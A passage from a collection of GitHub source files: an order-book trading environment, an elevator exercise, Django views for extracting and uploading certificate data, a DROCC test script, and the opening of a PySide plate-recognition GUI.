frame.axis(\"off\")\n plt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n plt.margins(0, 0)\n\n fig.patch.set_visible(False)\n frame.imshow(data)\n fig.canvas.draw()\n img = fig.canvas.renderer._renderer\n\n plt.close()\n\n return np.array(img)\n\n def plot_pnl(self):\n pnl = np.asarray(self.position_pnl_history)\n\n if pnl.shape[0] > 0:\n fig, price_frame = plt.subplots(1, 1, figsize=(2, 1), dpi=self.frame_width)\n\n min = abs(pnl.min())\n pnl = pnl + min\n\n # pnl_frame = price_frame.twinx()\n pnl_frame = price_frame\n pnl_frame.plot(pnl, color=\"black\")\n\n plt.fill_between(range(pnl.shape[0]), pnl, color=\"black\")\n\n plt.autoscale(tight=True)\n pnl_frame.axis(\"off\")\n fig.patch.set_visible(False)\n fig.canvas.draw()\n\n _img = fig.canvas.renderer._renderer\n\n plt.close()\n\n img = np.array(_img)\n img = Image.fromarray(np.uint8(img * 255)).convert(\"L\")\n\n return np.array(img)\n else:\n return np.zeros([self.frame_width, self.frame_width * 2])\n\n def show_img(self, img):\n # img = np.array(Image.fromarray(np.uint8(np.array(img) * 255))\n # .convert(\"RGB\"))\n\n cv2.imshow(\"image\", img)\n cv2.waitKey(1)\n\n def step(self, action):\n done = self.done\n\n if self.macd_diff_enabled:\n if self.macd_diff > 0:\n action = 0\n\n self.step_position(action)\n\n self.reward += self.current_trade.reward\n\n self.step_count += 1\n\n if self.trial:\n self.trial.report(self.capital, self.step_count)\n\n observation = self.get_observation()\n\n if not done:\n done = self.done\n\n reward = self.reset_reward()\n\n # alog.info((reward, self.reward, self.current_trade.reward))\n\n self.print_summary()\n\n return (\n observation,\n reward,\n done,\n {\"capital\": self.capital, \"trades\": self.trades, \"action\": action},\n )\n\n\n@click.command()\n@click.option(\"--cache\", is_flag=True)\n@click.option(\"--database_name\", \"-d\", default=\"binance\", type=str)\n@click.option(\"--depth\", default=72, type=int)\n@click.option(\"--group-by\", \"-g\", default=\"30s\", type=str)\n@click.option(\"--interval\", \"-i\", default=\"10m\", type=str)\n@click.option(\"--leverage\", default=1.0, type=float)\n@click.option(\"--max-volume-quantile\", \"-m\", default=0.99, type=float)\n@click.option(\"--offset-interval\", \"-o\", default=\"0h\", type=str)\n@click.option(\"--round-decimals\", \"-D\", default=4, type=int)\n@click.option(\"--sequence-length\", \"-l\", default=48, type=int)\n@click.option(\"--summary-interval\", \"-s\", default=1, type=int)\n@click.option(\"--window-size\", \"-w\", default=\"2m\", type=str)\n@click.argument(\"symbol\", type=str)\ndef main(**kwargs):\n env = OrderBookFrameEnv(\n show_img=True,\n short_class_str=\"ShortRewardPnlDiffTrade\",\n flat_class_str=\"FlatRewardPnlDiffTrade\",\n random_frame_start=False,\n short_reward_enabled=True,\n is_training=False,\n max_short_position_length=0,\n min_change=-0.5,\n **kwargs\n )\n\n env.reset()\n\n choice_args = dict(a=[0, 1], p=[0.9, 0.1])\n\n _done = False\n step = 0\n\n while not _done:\n state, reward, done, summary = env.step(np.random.choice(**choice_args))\n step += 1\n _done = done\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"joliveros/exchange-data","sub_path":"tgym/envs/orderbook/_orderbook_frame_env.py","file_name":"_orderbook_frame_env.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"35472159282","text":"people_count = int(input('Enter count of people: '))\n\ncounter = 1\npeople_weights = []\n\nwhile counter <= people_count:\n people_kilograms = int(input('Enter kilograms for each person: '))\n people_weights += [people_kilograms]\n\n counter += 1\n\n\nfloors = int(input('Enter count of floors: '))\n\ncounter_2 = 1\nfloors_numbers = []\n\nwhile counter_2 <= floors:\n number_of_floor = int(input('Enter number of floor: '))\n floors_numbers += [number_of_floor]\n\n counter_2 += 1\n\n\nprint('\\nThe kilograms of each person: ', people_weights)\nprint('\\nThe number of each floor: ', floors_numbers)\n\n\nmax_ppl = 2\nmax_kg = 250\nelevator_weight = []\ntrips = 0\n\nfor i in people_weights:\n elevator_weight += [i]\n if sum(elevator_weight) <= max_kg:\n if len(elevator_weight) <= max_ppl:\n trips += 1\n else:\n trips += 1\n\nprint('\\nThe count of trips are: ', trips)\n","repo_name":"KonstantinKocev/Programming0","sub_path":"Bonus_exs/Elevator_task.py","file_name":"Elevator_task.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41313927365","text":"\"\"\" \nApplication Module for Views.\nTODO: (Details)\n\"\"\"\n\n\n# Django Libraries\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.core.files.storage import FileSystemStorage\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.core.mail import send_mail\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view,authentication_classes,permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated,BasePermission\n#Developer Libaries\nfrom api.models import Certificate,ExtractedDataCSV,TagConfigurationTemplate,ManualLogTemplate,CoalParameters,CoalParametersSection,CoalParametersDividers,UserActivities\nfrom api.serializers import CertificateSerializer,UserActivitiesSerializer,TagConfigurationTemplateSerializer,ManualLogTemplateSerializer\nfrom api.libs.coal.controller.controller import Controller \nfrom api.libs.dga.dga_extractor import *\nfrom api.libs.pi.pi import *\nfrom api.libs.consts.activitylog_status import *\nfrom api.libs.tagconfiguration.tag_conf import preview_configuration,extract_param_tag_mapping,map_data_tagnames\nfrom .data_access_policy import PIDataAccessPolicy\nfrom .pagination import ModifiedPagination\n#Other Libraries\nimport pandas as pd\nimport os\nfrom datetime import datetime,timedelta\nfrom background_task import background\nfrom urllib.parse import urlparse\n\n#consts\nconsts_df = pd.read_csv(\"api\\\\libs\\\\coal\\\\data\\\\templates\\\\consts.csv\")\n\n#PERMISSIONS\nclass IsDataValidator(BasePermission):\n def has_permission(self, request, view):\n if request.user and request.user.groups.filter(name='data_validator'):\n return True\n return False\n\n#VIEWS\nclass CertificateViewSet(viewsets.ModelViewSet):\n \"\"\"API Class View for Certificates model.\n \n Attributes:\n permission_classes (Tuple): Tuple of Permission Classes.\n queryset (QuerySet): Queryset for all certificates\n serializer_class (Object): Type of Model Serializer.\n\n Methods:\n list(request)\n Returns an api response of the list of certificates.\n \"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = CertificateSerializer\n queryset = Certificate.objects.all()\n def list(self, request):\n \"\"\"Returns an api response of the list of certificates.\n \n Args:\n request (Request): A request instance\n\n Returns:\n Response: An API response of the list of certificates.\n \"\"\"\n queryset = Certificate.objects.all()\n serializer = CertificateSerializer(queryset, many=True)\n user = request.user\n return Response(serializer.data)\n\n def partial_update(self,request,*args, **kwargs):\n instance = self.queryset.get(pk=kwargs.get('pk'))\n serializer = self.serializer_class(instance, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n\nclass TagConfigurationTemplateViewSet(viewsets.ModelViewSet):\n \"\"\"API Class View for Certificates model.\n \n Attributes:\n permission_classes (Tuple): Tuple of Permission Classes.\n queryset (QuerySet): Queryset for all certificates\n serializer_class (Object): Type of Model Serializer.\n\n Methods:\n list(request)\n Returns an api response of the list of certificates.\n \"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = TagConfigurationTemplateSerializer\n queryset = TagConfigurationTemplate.objects.all()\n\n def get_permissions(self): \n self.permission_classes = [IsAuthenticated,IsDataValidator,]\n return super(TagConfigurationTemplateViewSet, self).get_permissions()\n\nclass ManualLogTemplateViewSet(viewsets.ModelViewSet):\n permission_classes = (IsAuthenticated,)\n serializer_class = ManualLogTemplateSerializer\n queryset = ManualLogTemplate.objects.all()\n\n # def get_permissions(self): \n # self.permission_classes = [IsAuthenticated,IsDataValidator,]\n # return super(TagConfigurationTemplateViewSet, self).get_permissions()\n\nclass UserActivitiesViewSet(viewsets.ModelViewSet):\n \"\"\"API Class View for UserActivities model.\n \n Attributes:\n pagination_class (Object): Type of Pagination Class\n permission_classes (Object): Type of Permission Class\n queryset (Queryset): Queryset on the list of certificates ordered by\n timestamp and excluding 'IN_PROGRESS' status\n serializer_class (Object): Type of Data Serializer Class\n \"\"\"\n permission_classes = (IsAuthenticated,)\n serializer_class = UserActivitiesSerializer\n pagination_class = ModifiedPagination\n queryset = UserActivities.objects.all().order_by('-timestamp').exclude(status=\"P\")\n\n\n@api_view(['GET'])\n@permission_classes((IsAuthenticated,))\ndef get_home(request):\n return Response({\"message\": \"Welcome to C8-Cube API\"},status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef get_user_groups(request):\n groups = request.user.groups.all()\n groups = [group.name for group in groups]\n return Response(groups,status=status.HTTP_200_OK)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef extract_data(request):\n \"\"\"API Functional View on extracting data.\n \n Args:\n request (Request): A request instance\n \n Returns:\n Response: An API response describing the status message of extracting data.\n \"\"\"\n try:\n _id = request.query_params[\"_id\"]\n queryset = Certificate.objects.filter(id = _id)\n cert = queryset[0]\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n req_user = str(request.user)\n activity = \"Extract Data from Certificate with id {}\".format(_id)\n log_user_activity(req_user,activity,IN_PROGRESS)\n extract_data_background(_id,req_user,activity)\n return Response({\"message\" : \"Data Queued for Extraction\",\"results\" : []},status=status.HTTP_200_OK)\n except Exception as e:\n print(e)\n return Response({\"error\" : str(e)},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef view_data(request):\n \"\"\"API Functional View on viewing extracted data.\n \n Args:\n request (Request): A request instance\n \n Returns:\n Response: An API response returning the results of data extration.\n \"\"\"\n try:\n _id = request.query_params[\"_id\"]\n queryset = Certificate.objects.filter(id = _id)\n cert = queryset[0]\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n results = check_extracted_data(_id).to_dict(orient=\"records\")\n return Response({\"message\" : \"Data Extracted\",\"results\" : results,\"cert\":{\"id\":cert.id,'name':cert.name,'tag_configuration_id':cert.tag_configuration_id}},status=status.HTTP_200_OK)\n except Exception as e:\n print(e)\n return Response({\"error\" : str(e)},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef view_pdf(request):\n \"\"\"API Functional View on viewing uploaded pdf file.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n HttpResponse: application/pdf response of the specified certificate.\n \"\"\"\n try:\n fs = FileSystemStorage()\n _id = request.query_params[\"_id\"]\n cert = Certificate.objects.get(id=_id)\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n if fs.exists(cert_path):\n with fs.open(cert_path) as pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n return response\n else:\n return HttpResponseNotFound('The requested pdf was not found in our server.')\n except Exception as e:\n return HttpResponseNotFound('The requested pdf was not found in our server.')\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef save_edited_data(request):\n \"\"\"API Functional View on saving edits from extracted data.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n Response: An API response returning the status on saving edits from extracted data.\n \"\"\"\n print(\"Saving edited data\")\n try:\n _id = request.query_params[\"_id\"]\n activity = \"Edit Data from Certificate with id {}\".format(_id)\n req_user = str(request.user)\n data_to_save = request.data\n data_df = pd.DataFrame.from_records(data_to_save)\n extracted_data_csv = ExtractedDataCSV.objects.get(id = _id)\n data_df.to_csv(extracted_data_csv.filepath, index=False)\n log_user_activity(req_user,activity,COMPLETED)\n return Response({\"message\" : \"Edited Data Saved\"},status=status.HTTP_200_OK)\n except Exception as e:\n log_user_activity(req_user,activity,FAILED)\n return Response({\"message\" : \"Saving Failed\"},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef test_pi_connection(request):\n \"\"\"API Functional View on testing PI connection.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n Response: An API response returning the status on testing PI Connection.\n \"\"\"\n print(\"Testing PI connection\")\n try:\n host = request.data.get(\"host\")\n response = get_pi_connection(request)\n if response.status_code == status.HTTP_200_OK:\n dataservers_url = \"{}/dataservers\".format(host)\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n dataservers = get_pi_dataservers(dataservers_url,username,password)\n return Response({\"message\" : \"Connection to {} successful \".format(host),\"dataservers\": dataservers},status=status.HTTP_200_OK)\n else:\n return Response({\"error\": PI_CONNECTION_ERROR.format(host)},status=response.status_code)\n except Exception as e:\n print(e)\n return Response({\"message\" : \"Saving Failed\"},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef upload_certificate_data(request):\n \"\"\"API Functional View on uploading extracted data to PI.\n \n Args:\n request (Request): A Request instance\n \n Returns:\n Response: An API response returning the status on uploading extracted data to PI.\n \"\"\"\n\n #Request \n _id = request.query_params[\"_id\"]\n activity = \"Upload Data from Certificate with id {}\".format(_id)\n req_user = str(request.user)\n try:\n #Preprocesses df\n metadata = request.data[\"metadata\"]\n data_to_save = request.data[\"piData\"]\n data_df = pd.DataFrame.from_records(data_to_save)\n data_df = data_df.dropna()\n data_df['Timestamp'] = pd.to_datetime(data_df['Timestamp']) \n data_df['Timestamp'] = data_df['Timestamp'].apply(lambda x : (x + timedelta(hours=8)).strftime(\"%Y-%m-%d %H:%M:%S.%f\"))\n #Get Tag Configuration\n extracted_data_csv = ExtractedDataCSV.objects.get(id = _id)\n certificate = Certificate.objects.get(id = _id)\n try:\n tag_conf = TagConfigurationTemplate.objects.get(id=certificate.tag_configuration_id)\n reference_path = os.path.join(settings.MEDIA_ROOT,str(tag_conf.reference))\n reference_df = pd.read_csv(reference_path)\n tag_mapping = extract_param_tag_mapping(data_df,reference_df,tag_conf.transformation)\n except Exception as e:\n print(e)\n reference_df = None\n DEFAULT_QUERY = \"Select Parameter,Parameter as Tagname from pi_data\"\n tag_mapping = extract_param_tag_mapping(data_df,reference_df,DEFAULT_QUERY)\n\n #Transform data for upload\n data_df['Uploaded'] = data_df.apply(\n lambda row : upload_to_pi_solo(metadata,{\n \"Parameter\":row[\"Parameter\"],\n \"Timestamp\":row[\"Timestamp\"],\n \"Value\":row[\"Value\"]}\n ) if row[\"Validated\"] else False,\n axis=1\n )\n\n count_uploaded_data = (data_df[\"Uploaded\"]).sum()\n #Save state and log activity\n data_df.to_csv(extracted_data_csv.filepath, index=False)\n log_user_activity(req_user,activity,COMPLETED)\n return Response({\"message\" : \"Certificate Data Upload Task completed. {} rows uploaded\".format(count_uploaded_data)},status=status.HTTP_200_OK)\n except Exception as e:\n raise(e)\n log_user_activity(req_user,activity,FAILED)\n return Response({\"message\" : \"Uploading Failed\"},status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\ndef upload_manual_data(request):\n try:\n #Preprocesses df\n metadata = request.data[\"metadata\"]\n data_to_save = request.data[\"piData\"]\n data_df = pd.DataFrame.from_records(data_to_save)\n data_df = data_df.dropna()\n data_df['Timestamp'] = pd.to_datetime(data_df['Timestamp']) \n data_df['Timestamp'] = data_df['Timestamp'].apply(lambda x : (x + timedelta(hours=8)).strftime(\"%Y-%m-%d %H:%M:%S.%f\"))\n\n #TODO Tag Configuration\n\n #Transform data for upload\n data_df['Uploaded'] = data_df.apply(\n lambda row : upload_to_pi_solo(metadata,{\n \"Parameter\":row[\"Parameter\"],\n \"Timestamp\":row[\"Timestamp\"],\n \"Value\":row[\"Value\"]}\n ) if row[\"Validated\"] else False,\n axis=1\n )\n count_uploaded_data = (data_df[\"Uploaded\"]).sum()\n return Response({\"message\" : \"Manual Logs Upload Task completed. {} rows uploaded\".format(count_uploaded_data)},status=status.HTTP_200_OK) \n except Exception as e:\n raise(e)\n return Response({\"message\" : \"Uploading Failed\"},status=status.HTTP_400_BAD_REQUEST) \n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef preview_configuration_api(request):\n try:\n _id = request.query_params[\"_id\"]\n activity = \"Test Configuration with certificate with id: {}\".format(_id)\n req_user = str(request.user)\n reference = request.data.get('reference')\n\n #@print(type(reference)==InMemoryUploadedFile)\n if reference:\n if type(reference) == str:\n reference = os.path.join(settings.BASE_DIR,urlparse(reference).path.replace(\"/\",\"\",1))\n print(reference)\n reference = pd.read_csv(reference)\n\n pi_data = check_extracted_data(_id)\n transformation = request.data.get('transformation')\n preview = preview_configuration(pi_data,reference,transformation).to_dict(orient=\"records\")\n #print(pd.read_csv(request.data.get('reference')))\n return Response({\"message\" : \"Sample tag/parameter map retrieved.\",\"preview\" : preview},status=status.HTTP_200_OK)\n except Exception as e:\n print(e)\n return Response({\"message\": \"Configuration Failed\"},status=status.HTTP_400_BAD_REQUEST) \n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,PIDataAccessPolicy))\ndef extract_manual_log_template(request):\n try:\n _id = request.query_params[\"_id\"]\n manuallogtemplate = ManualLogTemplate.objects.get(id=_id)\n template = pd.read_csv(manuallogtemplate.template).to_dict(orient=\"records\")\n print(template)\n return Response({\"message\" : \"Manual Log Template retrieved.\",\"template\" : template},status=status.HTTP_200_OK)\n except Exception as e:\n print(e)\n\n#HELPER FUNCTIONS\n@background(schedule=timezone.now())\ndef extract_data_background(_id,req_user,activity):\n \"\"\"Runs a process queue on extraction on specific uploaded file on background.\n \n Args:\n _id (int): Certificate/Document ID\n req_user (str): User requesting the extraction.\n activity (str): Description of the activity.\n \"\"\"\n cert = Certificate.objects.get(id = _id)\n if cert.cert_type == 'COAL': \n extract_coal_properties(_id,req_user,activity)\n elif cert.cert_type == 'DGA':\n extract_dga_params(_id,req_user,activity)\n\ndef extract_dga_params(_id,req_user,activity):\n \"\"\"Performs Data Extraction on DGA Certificates.\n \n Args:\n _id (int): Certificate/Document ID\n req_user (str): User requesting the extraction.\n activity (str): Description of the activity.\n \"\"\"\n cert = Certificate.objects.get(id = _id)\n cert.extraction_status = \"Q\"\n cert.save()\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n dfs = tabula.read_pdf(cert_path, pages='all')\n print(\"Extracting data from {}\".format(cert_path))\n print(\"Start Time : {}\".format(datetime.now()))\n concat = []\n for df in dfs:\n test_name = get_test_name(df.columns)\n print(test_name)\n df.columns = df.iloc[0]\n try:\n df = df[1:]\n df[\"Parameter\"] = df[get_parameters(df.columns)].apply(lambda x: \".\".join([test_name,filter_out_uom(str(x))]))\n #df[\"Parameter\"] = df[get_parameters(df.columns)].apply(lambda x: test_name if not x else filter_out_uom(str(x)))\n df[\"Timestamp\"] = datetime.now()\n df[\"Description\"] = None \n df[\"Validated\"] = True\n df[\"Uploaded\"] = False\n df['Value'] = df[get_values(df.columns)].apply(lambda x: extract_numbers_or_str(str(x)))\n df = df[~df[\"Parameter\"].str.contains(\"Equipment\") == True]\n concat.append(df)\n except Exception as e:\n pass\n #raise(e)\n final_results = pd.concat(concat, axis=0)\n final_results = final_results[[\"Parameter\",\"Description\",\"Timestamp\",\"Value\",\"Validated\",'Uploaded']]\n #final_results.columns = [\"Parameter\",\"Description\",\"Timestamp\",\"Value\",\"Validated\",'Uploaded']\n #Save file\n cert_name = cert.name\n cert_type = cert.cert_type\n #return Response({\"message\" : \"Data Extracted\",\"results\" : results},status=status.HTTP_200_OK)\n _dir,filename = os.path.split(cert.upload.path)\n extracted_csv_file_path = \"media\\\\extracted_data\\\\{}.csv\".format(filename.replace(\"PDF\",\"pdf\").replace(\"pdf\",\"csv\"))\n save_extracted_data(_id,cert_name,cert_type,extracted_csv_file_path,final_results)\n cert.extraction_status = \"E\"\n cert.save() \n log_user_activity(req_user,activity,COMPLETED)\n print(\"End Time : {}\".format(datetime.now()))\n\ndef extract_coal_properties(_id,req_user,activity):\n \"\"\"Performs Data Extraction on Coal Test/Analysis Certificates\n \n Args:\n _id (int): Certificate/Document ID\n req_user (str): User requesting the extraction.\n activity (str): Description of the activity.\n \"\"\"\n queryset = Certificate.objects.filter(id = _id)\n cert = queryset[0]\n cert.extraction_status = \"Q\"\n cert.save()\n cert_path = os.path.join(settings.MEDIA_ROOT,str(cert.upload))\n print(\"Extracting data from {}\".format(cert_path))\n print(\"Start Time : {}\".format(datetime.now()))\n params_df = pd.DataFrame.from_records(CoalParameters.objects.all().values('section','parameters'))\n sections_df = pd.DataFrame.from_records(CoalParametersSection.objects.all().values('sections'))\n dividers_df = pd.DataFrame.from_records(CoalParametersDividers.objects.all().values('dividers'))\n\n min_df = consts_df[consts_df[\"text\"]==\"min\"]\n max_df = consts_df[consts_df[\"text\"]==\"max\"]\n cosa_3_const_df = consts_df[consts_df[\"text\"]==\"cosa-3\"]\n cosa_4_1_const_df = consts_df[consts_df[\"text\"]==\"cosa-4.1\"]\n args = {\n \"min_df\" : min_df,\n \"max_df\" : max_df,\n \"cosa_3_const_df\" : cosa_3_const_df,\n \"cosa_4_1_const_df\" : cosa_4_1_const_df,\n \"parameters\" : params_df,\n \"sections\" : sections_df,\n \"dividers\" : dividers_df,\n }\n controller = Controller(args=args)\n try:\n results = controller.process_pdf(cert_path)\n results_df = pd.DataFrame(results)\n results_df[\"Uploaded\"] = False\n results_df = results_df[[\"Parameter\",\"Description\",\"Timestamp\",\"Value\",\"Validated\",'Uploaded']]\n #Save file\n cert_name = cert.name\n cert_type = cert.cert_type\n _dir,filename = os.path.split(cert.upload.path)\n extracted_csv_file_path = \"media\\\\extracted_data\\\\{}.csv\".format(filename.replace(\"PDF\",\"pdf\").replace(\"pdf\",\"csv\"))\n save_extracted_data(_id,cert_name,cert_type,extracted_csv_file_path,results_df)\n cert.extraction_status = \"E\"\n cert.save()\n log_user_activity(req_user,activity,COMPLETED)\n except Exception as e:\n print(e)\n cert.extraction_status = \"X\"\n cert.save()\n log_user_activity(req_user,activity,FAILED)\n finally:\n print(\"End Time : {}\".format(datetime.now()))\n\ndef check_extracted_data(_id):\n \"\"\"Returns if there are data extracted from a specific document\n \n Args:\n _id (int): Certificate/Document ID\n \n Returns:\n dict/bool: Dictionary of Extracted Data or False.\n \"\"\"\n queryset = ExtractedDataCSV.objects.filter(id = _id)\n has_data = queryset.exists()\n if has_data:\n filepath = queryset[0].filepath\n extracted_data_df = pd.read_csv(filepath)\n extracted_data_df = extracted_data_df.where(extracted_data_df.notnull(), None)\n return extracted_data_df\n return has_data\n\ndef save_extracted_data(_id,name,cert_type,filepath,results_df):\n \"\"\"Saves extracted data to a columnar data (.csv)\n \n Args:\n _id (int): Certificate/Document ID\n name (str): Document name\n cert_type (str): Document/Certificate Type\n filepath (str): Document path\n results_df (DataFrame): Dataframe representation of extracted data.\n \"\"\"\n print(results_df)\n print(\"Saving extracted data\")\n results_df.to_csv(filepath, index=False)\n extracted_data_csv = ExtractedDataCSV(id=_id,name=name,cert_type=cert_type,filepath=filepath)\n extracted_data_csv.save()\n\ndef log_user_activity(user,activity,status):\n \"\"\"Logs user activities\n \n Args:\n user (str): Request User\n activity (str): Activity Description\n status (str): Activity Status\n \n Returns:\n int: UserActivity ID\n \"\"\"\n timestamp = datetime.now()\n user_activity = UserActivities(user=user,activity=activity,timestamp=timestamp,status=status)\n user_activity.save()\n return user_activity.id\n","repo_name":"c8AwesomeDevs/jimahcertsapi","sub_path":"api/views_old.py","file_name":"views_old.py","file_ext":"py","file_size_in_byte":23041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20227036356","text":"from imports import *\nfrom models.drocc import PU_DROCC, DROCC\n\n\ndef test_onevsall(alpha=0.5,\n n = 10,\n pos_labels=[0],\n params=None,\n name='blank'):\n results = {}\n\n models = ['DROCC', 'PU_DROCC']\n for model_type in models:\n results[model_type] = []\n\n train_holder = get_data('CIFAR10',\n True,\n pos_label=None,\n neg_label=None,\n norm_flag=False)\n\n test_holder = get_data('CIFAR10',\n False,\n pos_label=None,\n neg_label=None,\n norm_flag=False)\n\n for pos_label in tqdm(pos_labels):\n\n train_bin = train_holder.pos_neg_split([pos_label])\n test_bin = train_holder.pos_neg_split([pos_label])\n\n\n\n res = {}\n for model_type in models:\n res[model_type] = []\n\n for i in tqdm(range(n)):\n train_data, pi = train_bin.get_dataset(alpha, svm_labels=False)\n test_data, pi_test = test_bin.get_dataset(alpha, c=0, svm_labels=False)\n\n test_loader = torch.utils.data.DataLoader(test_data,\n batch_size=512,\n shuffle=True)\n\n drocc = DROCC().to(device)\n drocc.run_train(train_data.lab_data(lab=1), None, **params[pos_label]['DROCC'])\n res['DROCC'].append(drocc.test(test_loader))\n\n pu_drocc = PU_DROCC().to(device)\n pu_drocc.run_train(train_data, None, **params[pos_label]['PU_DROCC'])\n res['PU_DROCC'].append(pu_drocc.test(test_loader))\n\n for model in res:\n results[model].append(res[model])\n\n # with open(f'/content/gdrive/My Drive/results/{name}.pcl', 'wb') as f:\n # pickle.dump(results, f)\n\n return results\n","repo_name":"jbr-ai-labs/PU-OC","sub_path":"test/DROCC/one-vs-all.py","file_name":"one-vs-all.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"3177679076","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nfrom PySide import *\nfrom plate_recog import *\n\n# Main window\nclass RecognizerWindow(QtGui.QWidget):\n\tCOL_QTY = 6\n\tLIN_QTY = 8\n\n\tdef __init__(self):\n\t\tsuper(RecognizerWindow, self).__init__()\n\t\tself.neuralNet = NeuralNet()\n\t\tself.setLayout(self.buildMainScreen())\n\t\tself.trained = False\n\t\tself.answers = {\n\t\t\t\t\t\"000000\" : \"0\" , \n\t\t\t\t\t\"000001\" : \"1\" , \n\t\t\t\t\t\"000010\" : \"2\" , \n\t\t\t\t\t\"000011\" : \"3\" , \n\t\t\t\t\t\"000100\" : \"4\" , \n\t\t\t\t\t\"000101\" : \"5\" , \n\t\t\t\t\t\"000110\" : \"6\" , \n\t\t\t\t\t\"000111\" : \"7\" , \n\t\t\t\t\t\"001000\" : \"8\" , \n\t\t\t\t\t\"001001\" : \"9\" , \n\t\t\t\t\t\"001010\" : \"A\" , \n\t\t\t\t\t\"001011\" : \"B\" , \n\t\t\t\t\t\"001100\" : \"C\" , \n\t\t\t\t\t\"001101\" : \"D\" , \n\t\t\t\t\t\"001110\" : \"E\" , \n\t\t\t\t\t\"001111\" : \"F\" , \n\t\t\t\t\t\"010000\" : \"G\" , \n\t\t\t\t\t\"010001\" : \"H\" , \n\t\t\t\t\t\"010010\" : \"I\" , \n\t\t\t\t\t\"010011\" : \"J\" ,\n\t\t\t\t\t\"010100\" : \"K\" , \n\t\t\t\t\t\"010101\" : \"L\" , \n\t\t\t\t\t\"010110\" : \"M\" , \n\t\t\t\t\t\"010111\" : \"N\" , \n\t\t\t\t\t\"011000\" : \"O\" , \n\t\t\t\t\t\"011001\" : \"P\" , \n\t\t\t\t\t\"011010\" : \"Q\" , \n\t\t\t\t\t\"011011\" : \"R\" , \n\t\t\t\t\t\"011100\" : \"S\" , \n\t\t\t\t\t\"011101\" : \"T\" , \n\t\t\t\t\t\"011110\" : \"U\" , \n\t\t\t\t\t\"011111\" : \"V\" , \n\t\t\t\t\t\"100000\" : \"W\" , \n\t\t\t\t\t\"100001\" : \"X\" , \n\t\t\t\t\t\"100010\" : \"Y\" , \n\t\t\t\t\t\"100011\" : \"Z\" }\n\n\tdef buildTrainScreen(self):\n\t\ttrainScreen = QtGui.QGroupBox(self.trUtf8(\"Treinamento\"))\n\t\tlayout = QtGui.QVBoxLayout()\n\n\t\tform = QtGui.QWidget()\n\t\tformLayout = QtGui.QFormLayout()\n\n\t\tfileInput = QtGui.QWidget()\n\t\tfileInputLayout = QtGui.QHBoxLayout()\n\t\tself.txtFilePath = QtGui.QLineEdit()\n\t\tself.btnSelectFile = QtGui.QPushButton(self.trUtf8(\"Arquivo...\"))\n\t\tself.btnSelectFile.clicked.connect(self.selectFilePatt)\n\t\tfileInputLayout.addWidget(self.txtFilePath)\n\t\tfileInputLayout.addWidget(self.btnSelectFile)\n\t\tfileInput.setLayout(fileInputLayout)\n\t\tformLayout.addRow(self.trUtf8(\"Arquivo de padrões: \"), fileInput)\n\n\t\tself.txtNumNeurons = QtGui.QSpinBox()\n\t\tself.txtNumNeurons.setValue(20)\n\t\tformLayout.addRow(self.trUtf8(\"Nº neurônios camada intermediária: \"), self.txtNumNeurons)\n\n\t\tself.txtLearningRate = QtGui.QDoubleSpinBox()\n\t\tself.txtLearningRate.setValue(0.5)\n\t\tself.txtLearningRate.setRange(0.0, 1.0)\n\t\tformLayout.addRow(self.trUtf8(\"Taxa de aprendizagem: \"), self.txtLearningRate)\n\n\t\tself.txtNumIterations = QtGui.QSpinBox()\n\t\tself.txtNumIterations.setRange(10,100000)\n\t\tself.txtNumIterations.setValue(500)\n\t\tformLayout.addRow(self.trUtf8(\"Número de iterações: \"), self.txtNumIterations)\n\n\t\tform.setLayout(formLayout)\n\t\tlayout.addWidget(form)\n\n\n\t\tbuttonBar = QtGui.QWidget()\n\t\tbuttonBarLayout = QtGui.QHBoxLayout()\n\t\tself.btnTrain = 